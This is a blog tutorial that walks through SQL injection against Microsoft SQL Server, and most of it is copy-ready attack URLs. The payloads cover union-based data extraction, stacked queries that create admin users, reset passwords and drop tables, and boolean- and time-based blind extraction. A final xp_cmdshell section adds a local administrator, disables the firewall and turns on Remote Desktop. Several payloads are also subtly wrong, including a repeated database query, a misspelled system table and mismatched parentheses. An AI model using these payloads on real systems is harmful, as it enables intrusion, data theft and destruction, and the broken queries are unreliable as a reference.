i MSSQL Server injection tutorial – All things in moderation

MSSQL Server injection tutorial

In this tutorial, I will show you how to hacking MS SQL server using some SQL injection technique supported MS SQL server.

Types of Injection for MS SQL Server

1. Union query
2. Stacked query
3. Boolean-based Blind
4. Time-based Blind Injection
5. Stored procedure injection

For example, consider follow url:

http://example.com/news.asp?id=1

Suppose the query executed from the server is the following:

SELECT title, content from news where new_id=id

1. Check for vulnerability

Before testing for SQL vulnerability, we need to know comment type for MSSQL: –, –+, –+-, /**/ (inline comment) ;%00 (null byte comment)

We add to the end of URL some characters like ‘ (quote),  ” (double quote), comment…

http://example.com/news.asp?id=1'

If we get some error like this “Microsoft OLE DB Provider for SQL Server error ‘80040e14’Unclosed quotation mark before the character string ‘./news.asp, line 5“. That means we have vulnerability SQL injection.

2. Injection

Technique 1: UNION query

  • Find the number of columns:

    To find number of columns we use ORDER BY statement.

    http://example.com/news.asp?id=1 ORDER BY 1;-- - <-- no error
    http://example.com/news.asp?id=1 ORDER BY 2;-- - <-- no error
    http://example.com/news.asp?id=1 ORDER BY 3;-- - <-- error

    We get message like this “The ORDER BY position number 3 is out of range of the number of items in the select list.”
    That means this site has 2 columns, cause we got an error on 3.

  • Check for UNION query:

    With union query, we can select more data in one SQL statement.
    So we have

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,2; -- -

    (we already found that number of columns are 2 in section “find number of columns”)
    if we see some numbers on screen, i.e 1 or 2 then the UNION works.

  •  Exploit:

    – Check MSSQL version. current database, username

    Let say that we have two columns, now we check its version.
    We replace the number 2 with @@version, db_name(), user
    it should look like this

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,@@version; -- -
    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,db_name(); -- -
    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,user; -- -

    – Enumerate database, table and column name.
    1. Enumerate database
    MSSQL server query: SELECT name FROM master..sysdatabases;

    We will have url:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,name FROM master..sysdatabase; -- -

    2. Enumerate tables
    MSSQL server query: SELECT name FROM testdb..sysobjects WHERE xtype = ‘U’;

    We will have url:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,name FROM master..sysdatabase; -- -
    

    3. Enumerate columns
    MSSQL server query:
    SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tbl_name’); — for the current DB only
    SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’ttb_name’; — list columns name for some table

    We will have url:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tbl_name'); -- -

    Technique 2: Stacked query

    MSSQL server may be possible to execute multiple queries in one call. Example:

    http://example.com/news.asp?id=-1; INSERT INTO tblusers values('admin', 'admin'); -- -
    http://example.com/news.asp?id=-1; UPDATE tblusers SET password='newpassword' WHERE username='admin';--
    http://example.com/news.asp?id=-1; DELETE FROM tblusers where username='admin'; -- -
    http://example.com/news.asp?id=-1; DROP TABLE tblusers; -- -
    ...
    

    Technique 3: Boolean-based Blind

    In a good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data.

    Which is injectable through the methods seen previously. What we want to obtain is the values of the username field. The tests that we will execute will allow us to obtain the value of the username field, extracting such value character by character. This is possible through the use of some standard functions, present in practically every database. For our examples, we will use the following functions:

    SUBSTRING (string, start, length): returns a substring starting from the position “start” of string and of length “length”. If “start” is greater than the length of text, the function returns a null value.

    ASCII (char): it gives back ASCII value of the input character. A null value is returned if char is 0.

    LEN (string): it gives back the number of characters in the input text.

    Through such functions, we will execute our tests on the first character and, when we have discovered the value, we will pass to the second and so on, until we will have discovered the entire value. Example, we will use the following value for Id:
    The first we will find the length of the string by using LEN function.

    http://example.com/news.asp?id=-1' AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -

    Then we will find all character of string by using ASCII and SUBSTRING functions.

    http://example.com/news.asp?id=-1' AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97 ; -- -

    Technique 4: Time-based Blind

    Similar to Boolean-based Blind, Time-based Blind also use functions : SUBSTRING, ASCII, LEN. and discover a character of string until the end of string. But this technique executed by measuring the time that the web application takes to answer a request. A typical approach uses the waitfor delay command.

    ex: if exists (SELECT * FROM tblusers) waitfor delay '0:0:5'

    Example, we will use the following value for Id:
    The first we will find the length of the string by using LEN function.

    http://example.com/news.asp?id=-1'; IF LEN(SELECT TOP 1 username FROM tblusers)=5 waitfor delay '0:0:5'; -- -

    Then we will find all character of string by using ASCII and SUBSTRING functions.

    http://example.com/news.asp?id=-1'; IF ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97 waitfor delay '0:0:5'; -- -

    Technique 5: Stored procedure

  • Useful stored procedures include:
    • xp_cmdshell executes any command shell in the server with the same permissions that it is currently running. By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
    • xp_regread reads an arbitrary value from the Registry (undocumented extended procedure)
    • xp_regwrite writes an arbitrary value into the Registry (undocumented extended procedure)
    • sp_makewebtask Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires sysadmin privileges.
    • xp_sendmail Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.Example xp_cmdshell
      1. open xp_cmdshell — To allow advanced options to be changed.EXEC sp_configure ‘show advanced options’, 1;– To update the currently configured value for advanced options.RECONFIGURE;– To enable the feature.EXEC sp_configure ‘xp_cmdshell’, 1;– To update the currently configured value for this feature.RECONFIGURE;payload

      -1; EXECUTE sp_configure ‘show advanced options’, 1; RECONFIGURE;EXECUTE sp_configure ‘xp_cmdshell’, 1; RECONFIGURE; — –

      2. disable firewall and open remote desktop. if have system admin privileges

      EXECUTE master..xp_cmdshell ‘net user abc 123456 /ADD’;

      EXECUTE master..xp_cmdshell ‘net localgroup Administrators abc /ADD’;

      EXECUTE master..xp_cmdshell ‘netsh firewall set opmode disable’;

      EXECUTE master..xp_cmdshell ‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’;

    • References

MS SQL server injection cheat sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

Owasp testing guide v4: https://www.owasp.org/index.php/Testing_for_SQL_Server

One Response

  1. Patrick May 26, 2018

Leave a Reply